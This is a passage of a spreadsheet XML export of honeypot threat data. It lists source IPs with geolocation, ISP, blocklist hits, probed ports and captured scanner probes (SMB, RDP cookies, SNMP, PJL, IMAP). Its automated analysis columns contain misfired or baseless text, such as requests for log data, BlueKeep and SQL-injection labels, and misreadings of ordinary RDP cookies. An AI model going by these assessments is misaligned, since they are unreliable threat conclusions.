(,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,65346)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,38713)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,59960)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,62015)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,62106)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,49943)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,50254)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,61874)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,61984)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,50556)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,50653)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,58090)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:defe:4c38"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="45"/>
    <x v="45"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:10:18"/>
    <d v="2023-12-14T14:57:04"/>
    <d v="2025-04-30T22:10:18"/>
    <n v="378"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;23546&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IL"/>
    <s v="Israel"/>
    <s v="M"/>
    <s v="Central District"/>
    <s v="Petach Tikva"/>
    <s v="Rosh HaAyin"/>
    <s v="293690"/>
    <s v="NA"/>
    <s v="32.1083"/>
    <s v="34.9689"/>
    <s v="51825"/>
    <s v="Telzar 019 International Telecommunications Services LTD"/>
    <s v="Hallo ISP"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d589:4a5f"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze or describe any malicious activity. &amp;&amp; No log data provided, unable to analyze activity."/>
    <m/>
  </r>
  <r>
    <x v="46"/>
    <x v="46"/>
    <s v="NA&amp;&amp;122-116-7-184.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-30T22:09:17"/>
    <d v="2025-02-14T22:22:51"/>
    <d v="2025-04-30T22:09:17"/>
    <n v="44"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="23&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NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;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7a74:7b8"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="47"/>
    <x v="47"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:58:48"/>
    <d v="2025-01-09T08:48:57"/>
    <d v="2025-04-30T21:58:48"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA&amp;&amp;55820"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Los Angeles"/>
    <s v="Los Angeles"/>
    <s v="5368361"/>
    <s v="90009"/>
    <s v="34.0549"/>
    <s v="-118.243"/>
    <s v="21859"/>
    <s v="Zenlayer Inc"/>
    <s v="Zenlayer Inc"/>
    <s v="business"/>
    <s v="ZENLA"/>
    <s v="2016-09-07"/>
    <s v="ZL-LAX3-004"/>
    <s v="2018-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:800e:b576"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No suspicious activity detected via TELNET service, no incoming or outgoing connections reported."/>
    <m/>
  </r>
  <r>
    <x v="48"/>
    <x v="48"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:49:44"/>
    <d v="2025-03-01T13:22:59"/>
    <d v="2025-04-30T21:49:44"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2010-08-02"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e35:e1ee"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="No TELNET traffic was detected during this time frame, which suggests that an attacker may have been attempting to exploit a vulnerability or test for open connections but did not initiate any communication with the vulnerable service. This lack of activity could be indicative of reconnaissance or probing for potential vulnerabilities. It is also possible that no malicious TELNET activity occurred at all."/>
    <m/>
  </r>
  <r>
    <x v="49"/>
    <x v="49"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:48:25"/>
    <d v="2023-11-22T10:10:25"/>
    <d v="2025-04-30T21:48:25"/>
    <n v="676"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_ORACLE_H3&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_ORACLE_H18&amp;&amp;SMA-LAB_SOCKS5_H45&amp;&amp;SMA-LAB_ORACLE_H41&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_POP3_H19&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_IRC_H40&amp;&amp;SMA-LAB_VNC_H4&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_SIP_H30&amp;&amp;SMA-LAB_SMB_H22&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_ORACLE_H12&amp;&amp;SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H41&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_SNMP_H46&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_FTP_H23&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_FTP_H15&amp;&amp;SMA-LAB_NTP_H33&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_ORACLE_H24&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_SNMP_H16&amp;&amp;SMA-LAB_ORACLE_H25&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_RDP_H31&amp;&amp;SMA-LAB_SNMP_H30&amp;&amp;SMA-LAB_SIP_H2&amp;&amp;SMA-LAB_SIP_H44&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_SNMP_H8&amp;&amp;SMA-LAB_POP3_H25&amp;&amp;SMA-LAB_FTP_H32&amp;&amp;SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_IMAP_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1521&amp;&amp;5432&amp;&amp;161&amp;&amp;1433&amp;&amp;1080&amp;&amp;20836&amp;&amp;110&amp;&amp;389&amp;&amp;3389&amp;&amp;23&amp;&amp;51701&amp;&amp;3306&amp;&amp;6667&amp;&amp;5900&amp;&amp;NA&amp;&amp;445&amp;&amp;6379&amp;&amp;9100&amp;&amp;50631&amp;&amp;53368&amp;&amp;50434&amp;&amp;143&amp;&amp;21&amp;&amp;52552&amp;&amp;80&amp;&amp;56024&amp;&amp;56325&amp;&amp;57646&amp;&amp;54699&amp;&amp;54763&amp;&amp;56204&amp;&amp;52390&amp;&amp;443&amp;&amp;56263&amp;&amp;53217&amp;&amp;54942"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'singular.ttk.pte.hu': ['unknown']}"/>
    <n v="138"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2022-01-11"/>
    <s v="PAN-22"/>
    <s v="2022-01-11"/>
    <s v="command&amp;&amp;connection&amp;&amp;request&amp;&amp;NA&amp;&amp;query&amp;&amp;stshash&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SIP:{'accept': 'text/plain', 'call-id': '8494217352@10.128.0.54', 'contact': 'sip:cUBYlaXq@10.128.0.54:50885', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:RwwWsSjx@10.128.0.54:50885;tag=22169567', 'max-forwards': '20', 'to': 'sip:gvovqMnS@203.29.241.98', 'user-agent': 'vFesjjmE', 'via': 'SIP/2.0/UDP 10.128.0.54:50885;branch=diXcCt.6324361511;received=205.210.31.54;rport;alias'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YpPkaPzia'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=QdBiha'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ErjolK'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,59962)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,59964)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,59978)}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,60220)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,60228)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,60236)}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,63212)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,63214)}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,64442)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,64454)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,64460)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hdpNTYmno'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HdgxZJ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vAxGwY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gPTZcXXxV'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yMXEgF'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NBkYkT'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,57940)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,57946)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,57960)}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pYGKambVl'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CJuBip'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HhzXcL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YXCaokBHn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pfgBCP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DXBqwo'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cRrUQFrFC'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f36"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The data suggests an attempt to access Microsoft SQL Server, which could be a sign of malicious activity related to database exploitation or unauthorized access. This may involve attempts to inject SQL code or steal sensitive information from the database server. It's a potential indication of a hacking incident. &amp;&amp; This indicates potential SIP flood or scanning activity, where an attacker is sending excessive or unauthorized requests to a service for malicious purposes such as denial of service or reconnaissance. &amp;&amp; There is insufficient log data to analyze any potential malicious activity. The provided information does not provide any insight into possible attacks or suspicious behavior. Further data would be needed to assess the situation accurately. &amp;&amp; The data suggests an attempt to access sensitive database credentials, possibly through brute-force or probing methods. This could be part of a larger attack to gain unauthorized access to the system's databases. &amp;&amp; No activity detected, SIP service appears inactive or unavailable, potential indication of network congestion or configuration issue. _x000a_Service is either down or inaccessible to clients. _x000a_No malicious activity reported from this source so far. &amp;&amp; An attacker is attempting to determine what capabilities are supported by a service, likely in preparation for exploiting or manipulating it. This could be part of a reconnaissance phase before launching further attacks. It may also indicate an attempt to gather information about the system's configuration. &amp;&amp; This log entry indicates a potential brute-force attack on an RDP service, with an attacker attempting to bypass authentication by manipulating the session hash. The modified hash is likely being used to trick the system into authenticating the attacker without proper credentials. This is a common tactic in RDP exploitation. &amp;&amp; Possible malicious activity: Unauthorized access to Remote Desktop service, potential brute-force attack attempt with suspicious hash value &quot;cRrUQFrFC&quot; in a cookie. Cookie-based authentication is unusual for RDP services. Malicious actor may be attempting to bypass login mechanisms."/>
    <s v="NTP Spoofing &amp;&amp; SQL Injection &amp;&amp; PortScan &amp;&amp; I don't see any log data provided. Please provide the actual log data so I can help analyze it and identify the type of attacks mentioned. &amp;&amp; Port Scan &amp;&amp; Blind RDP &amp;&amp; BlueKeep Attack"/>
  </r>
  <r>
    <x v="50"/>
    <x v="50"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:42:52"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-30T21:42:52"/>
    <n v="75"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="29"/>
    <s v="Gwangju"/>
    <s v="NA"/>
    <s v="Gwangju (Wolchul-dong)"/>
    <s v="1841811"/>
    <s v="NA"/>
    <s v="35.2403"/>
    <s v="126.869"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="KORNET"/>
    <s v="business"/>
    <s v="hanguggwanggisulwon"/>
    <s v="2006-11-01"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79b3:3f47"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="51"/>
    <x v="51"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:29:30"/>
    <d v="2025-04-09T05:16:36"/>
    <d v="2025-04-30T21:29:30"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:8238"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="52"/>
    <x v="52"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:28:11"/>
    <d v="2024-03-28T13:24:08"/>
    <d v="2025-04-30T21:28:11"/>
    <n v="913"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;SIP Endpoint Enumeration&amp;&amp;Encryption Misuse&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Credential_Stuffing_Attack_High"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_ORACLE_H9&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_FTP_H3&amp;&amp;SMA-LAB_ORACLE_H30&amp;&amp;SMA-LAB_SIP_H36&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_SMB_H11&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_ORACLE_H10&amp;&amp;SMA-LAB_IPP_H33&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_SIP_H27&amp;&amp;SMA-LAB_IPP_H28&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_SIP_H5&amp;&amp;SMA-LAB_IRC_H19&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;SMA-LA